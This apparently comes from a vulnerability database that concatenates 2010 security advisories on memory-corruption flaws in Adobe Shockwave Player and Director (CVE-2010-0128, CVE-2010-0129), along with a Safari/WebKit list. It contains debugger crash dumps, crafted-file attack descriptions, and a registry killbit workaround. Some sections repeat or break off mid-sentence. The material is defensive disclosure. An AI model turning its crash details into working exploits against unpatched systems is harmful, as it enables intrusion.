relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-17/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0051 | CVE-2010-0128 | Adobe Shockwave Player and Adobe Director Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer signedness error in dirapi.dll in Adobe Shockwave Player before 11.5.7.609 and Adobe Director before 11.5.7.609 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .dir file that triggers an invalid read operation. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
03/03/2010 - Vendor notified.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0128 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-19/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
Adobe Director DIRAPI.DLL Invalid Read Vulnerability
1. *Advisory Information*
Title: Adobe Director DIRAPI.DLL Invalid Read Vulnerability
Advisory Id: CORE-2010-0405
Advisory URL:
[http://www.coresecurity.com/content/adobe-director-invalid-read]
Date published: 2010-05-11
Date of last update: 2010-05-11
Vendors contacted: Adobe
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Input validation error [CWE-20]
Impact: Denial of service
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-0128
Bugtraq ID: N/A
3. *Vulnerability Description*
Adobe Director is prone to a vulnerability due to an invalid read in
'DIRAPI.DLL', when opening a malformed .dir file.
4. *Vulnerable packages*
. Adobe Director 11.5
. Adobe Director 11 (Version: 11.0.0.426)
5. *Non-vulnerable packages*
. Adobe Director 11.5 (Version: 11.5.7.609)
6. *Solutions and Workarounds*
See the Adobe Security Bulletin [1] available at
[http://www.adobe.com/go/apsb10-12/].
7. *Credits*
This vulnerability was discovered and researched by Nahuel Riva, from
Core Security Technologies. Publication was coordinated by Jorge
Lucangeli Obes.
8. *Technical Description*
The vulnerability occurs at offset '0x68174813' of the 'dirapi.dll'
module of Adobe Director. Improper validation of input data leads to a
crash in the memory read instruction. This vulnerability could result in
arbitrary code execution, although it was not verified.
/-----
App: Adobe Director 11
Version: 11.0.0.426
Module crash: Dirapi.dll Version: 11.0.0.426
Crash:
68174813 |. 8906 |MOV DWORD PTR DS:[ESI],EAX
68174815 |> 8B4C24 14 |MOV ECX,DWORD PTR SS:[ESP+14]
68174819 |. 51 |PUSH ECX
6817481A |. E8 3197F5FF |CALL <JMP.&IML32.#1414>
6817481F |. 8946 04 |MOV DWORD PTR DS:[ESI+4],EAX
68174822 |. 83C6 08 |ADD ESI,8
68174825 |. 4D |DEC EBP
68174826 |.^ 75 C8 \JNZ SHORT DIRAPI.681747F0
EAX=00000000
DS:[02889B20]=???
Registers:
EAX 00000000
ECX 00000068
EDX 00000001
EBX FFE4B4D4
ESP 0012DFB8
EBP 0000373D
ESI 02889B20
EDI 01BC9964
EIP 68174813 DIRAPI.68174813
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NEGATIVE_SEEK (00000083)
EFL 00250246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00000000 00000000
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00000000 00000000
ST3 empty -??? FFFF 00000000 00000000
ST4 empty 0.0000106994366433355
ST5 empty 0.6322773098945617676
ST6 empty -0.0034003453329205513
ST7 empty 1041416.9375000000000
3 2 1 0 E S P U O Z D I
FST 4220 Cond 1 0 1 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 007F Prec NEAR,24 Mask 1 1 1 1 1 1
Stack Trace:
Call stack of main thread
Address Stack Procedure / arguments Called from
Frame
0012DFC4 68175563 DIRAPI.681747A0 DIRAPI.6817555E
0012DFE4 6817003B DIRAPI.68175290 DIRAPI.68170036
0012E018 6817020D DIRAPI.6816FF40 DIRAPI.68170208
0012E01C 00A923C8 Arg1 = 00A923C8
0012E020 00000011 Arg2 = 00000011
0012E024 00000003 Arg3 = 00000003
0012E028 0012E050 Arg4 = 0012E050
0012E02C 00001100 Arg5 = 00001100
0012E048 680F6D50 DIRAPI.681701A0 DIRAPI.680F6D4B
0012E04C 00000000 Arg1 = 00000000
0012E050 00000003 Arg2 = 00000003
0012E054 00000091 Arg3 = 00000091
0012E058 0012E07C Arg4 = 0012E07C
0012E05C 00001100 Arg5 = 00001100
0012E068 6800CFC0 DIRAPI.680F6D30 DIRAPI.6800CFBB
0012E088 680817EC DIRAPI.6800CF80 DIRAPI.680817E7
0012E0B4 680823E3 DIRAPI.68081760 DIRAPI.680823DE
0012E0C8 680836A7 DIRAPI.68082380 DIRAPI.680836A2
0012E638 680839E2 DIRAPI.68082EA0 DIRAPI.680839DD
0012E634
0012E63C 00A86E8C Arg1 = 00A86E8C
0012E640 0012F5EC Arg2 = 0012F5EC
0012E644 00000000 Arg3 = 00000000
0012E648 00000000 Arg4 = 00000000
0012E64C 0000001A Arg5 = 0000001A
0012E674 68042D8C DIRAPI.68083970 DIRAPI.68042D87
0012F5EC
0012E678 00A86E8C Arg1 = 00A86E8C
0012E67C 0012F5EC Arg2 = 0012F5EC
0012E680 00000000 Arg3 = 00000000
0012E684 00000000 Arg4 = 00000000
0012E688 0000001A Arg5 = 0000001A
0012E6B0 6800A111 DIRAPI.68042C90 DIRAPI.#88+7C
0012E6B4 00A92588 Arg1 = 00A92588
0012E6B8 0012F5EC Arg2 = 0012F5EC
0012E6BC 00000000 Arg3 = 00000000
0012E6C0 0000001A Arg4 = 0000001A
0012E6DC 2018BB23 <JMP.&DIRAPI.#88> Director.2018BB1E
0012E83C 2027E776 ? Director.2018BAB0 Director.2027E771
- -----/
9. *Report Timeline*
. 2010-04-14:
Vendor contacted. 2010-04-14:
Vendor requests PoC file. 2010-04-14:
Core replies with the PoC file and the draft advisory. 2010-04-14:
Adobe replies that will investigate the issue and sets a preliminary
release date for June/July. 2010-04-15:
Core agrees with the preliminary release date. 2010-04-28:
Core requests an update on the situation, and asks whether Adobe was
able to confirm if the bug is exploitable. 2010-04-28:
Core requests a specific publication date for the fix. 2010-05-06:
Adobe informs Core that the release date for the fix has been set to May
11th. 2010-05-07:
Core asks Adobe if they want to provide the text for the "Solutions and
Workarounds" section of the advisory. 2010-05-07:
Adobe replies with the text for the "Solutions and Workarounds" section
of the advisory. 2010-05-11:
Advisory published.
10. *References*
[1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/].
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://www.coresecurity.com/corelabs].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkvptp4ACgkQyNibggitWa2lwACgo9oRhMUsmUe+IH3jdK9d7B+m
ebMAn1iAO1mYBqXGrm67F2oCxTd+OEe3
=s6Ek
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0052 | CVE-2010-0129 | Adobe Shockwave Player Integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Multiple integer overflows in Adobe Shockwave Player before 11.5.7.609 allow remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .dir (aka Director) file that triggers an array index error. Adobe Shockwave Player is prone to multiple remote code-execution vulnerabilities while parsing Director (.dir) files.
Attackers can exploit these issues to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
Note: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. User interaction is required
in that a user must visit a malicious web site. When a malicious value is used
extern to signed integer . Exploitation can lead to remote system
compromise under the credentials of the currently logged in user.
2010-5-11 Coordinated public release of advisory.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
These vulnerabilities were discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0129
IX.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
03/03/2010 - Vendor notified.
03/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-20/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it. iDefense Security Advisory 05.11.10
http://labs.idefense.com/intelligence/vulnerabilities/
May 11, 2010
I. BACKGROUND
Adobe Shockwave Player is a popular Web browser plugin. It is available
for multiple Web browsers and platforms, including Windows, and MacOS.
Shockwave Player enables Web browsers to display rich multimedia
content in the form of Shockwave videos. For more information, see the
vendor's site found at the following link:<BR> <BR>
http://get.adobe.com/shockwave
II. <BR> <BR> The
vulnerability takes place during the processing of a certain malformed
file. A function calculates an offset to be used within a memory mapped
file and returns the offset value. The return value is not checked. This
can lead to a condition where an attacker is able to overwrite memory
outside the bounds of the allocated memory map.
III. To exploit
this vulnerability, a targeted user must load a malicious file created
by an attacker. An attacker typically accomplishes this via social
engineering or injecting content into a compromised, trusted site. <BR>
<BR> Adobe Shockwave Player implements a custom memory management system
for object allocation. Due to the design of the memory allocator, an
attacker is able to predict the distance of objects within a memory
map. This condition can help facilitate reliable exploitation of this
vulnerability.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in the latest
version of Shockwave Player at the time of testing, version 11.5.6r606.
V. WORKAROUND
The killbit for the Shockwave Player ActiveX control can be set by
creating the following registry key:<BR> <BR>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{233C1507-6A77-46A4-9443-F871F945D258} Under this key
create a new DWORD value called "Compatibility Flags" and set its
hexadecimal value to 400. <BR> <BR> To re-enable Shockwave Player set
the "Compatibility Flags" value to 0.
VI. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://get.adobe.com/shockwave/
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-0129 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
03/03/2010 Initial Vendor Notification
03/03/2009 Initial Vendor Reply
05/11/2010 Coordinated Public Disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0876 | CVE-2010-1750 | Apple Safari window object invalid pointer vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in Apple Safari before 5.0 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper window management. Safari is prone to multiple security vulnerabilities that have been addressed in Apple security advisory APPLE-SA-2010-06-07-1. These issues affect versions prior to Safari 5.0 and 4.1 running on Apple Mac OS X, Windows 7, XP and Vista.
Attackers can exploit these issues by enticing an unsuspecting user into visiting a malicious webpage. Successful attacks may result in information-disclosure, remote code-execution, denial-of-service, or other consequences.
This BID is being retired. The following individual records exist to better document the issues:
40642 WebKit 'removeChild()' Remote Code Execution Vulnerability
40644 WebKit HTML Button Use After Free Remote Code Execution Vulnerability
40645 WebKit Marquee Event 'SelectionController' Remote Code Execution Vulnerability
40646 WebKit Editable Containers Remote Code Execution Vulnerability
40647 WebKit Option Element 'ContentEditable' Attribute Remote Code Execution Vulnerability
40649 WebKit 'ConditionEventListener' Remote Code Execution Vulnerability
40650 WebKit 'DOCUMENT_POSITION_DISCONNECTED' Attribute Remote Code Execution Vulnerability
40652 WebKit SVG 'RadialGradient' Attribute Remote Code Execution Vulnerability
40653 WebKit IBM1147 Character Set Text Transform Remote Code Execution Vulnerability
40654 WebKit Option Recursive Use Element Remote Code Execution Vulnerability
40655 WebKit 'first-letter' CSS Style Remote Code Execution Vulnerability
40656 WebKit SVG 'use' Element Remote Code Execution Vulnerability
40657 WebKit SVG 'use' Element Remote Code Execution Vulnerability
40658 WebKit Caption Element Handling Remote Code Execution Vulnerability
40659 WebKit Custom Vertical Positioning Remote Code Execution Vulnerability
40660 WebKit Dragging or Pasting Cross Domain Scripting Vulnerability
40661 WebKit Use After Free Remote Code Execution Vulnerability
40662 WebKit Hover Event Handling Remote Code Execution Vulnerability
40663 WebKit DOM Range Objects Remote Code Execution Vulnerability
40665 WebKit 'Node.normalize' Method Remote Code Execution Vulnerability
40665 WebKit 'Node.normalize' Method Remote Code Execution Vulnerability
40666 WebKit 'removeChild' DOM Method Remote Code Execution Vulnerability
40667 WebKit HTML Document Subtrees Remote Code Execution Vulnerability
40668 WebKit 'libxml' Context Handling Remote Code Execution Vulnerability
40669 Webkit UTF-7 Cross-Site Scripting Vulnerability
40670 WebKit Fonts Handling Remote Code Execution Vulnerability
40671 WebKit HTML Tables Remote Code Execution Vulnerability
40672 WebKit CSS-Styled HTML Handling Remote Code Execution Vulnerability
40673 Apple Safari PDF Handling Remote Code Execution Vulnerability
40674 Apple Safari Window Management Remote Code Execution Vulnerability
40675 Webkit HTML Document Fragments Cross Site Scripting Vulnerability
40697 WebKit Integer Truncation TCP Port Information Disclosure Vulnerability
40698 WebKit Keyboard Focus Cross Domain Information Disclosure Vulnerability
40704 Apple Safari Authentication Data URI Spoofing Vulnerability
40705 WebKit IRC Port Blacklist Information Disclosure Vulnerability
40707 Webkit DOM Constructor Object Cross Site Scripting Vulnerability
40710 WebKit 'frame.src' Validation Cross Site Scripting Vulnerability
40714 WebKit SVG Image Pattern Cross Domain Security Bypass Vulnerability
40717 WebKit Empty Hostname URI Handling Cross Site Scripting Vulnerability
40726 Webkit 'textarea' Element Cross-Site Scripting Vulnerability
40727 WebKit Cascading Stylesheets 'HREF' Information Disclosure Vulnerability
40732 WebKit HTTP Redirects Information Disclosure Vulnerability
40733 WebKit NTLM Credentials Information Disclosure Vulnerability
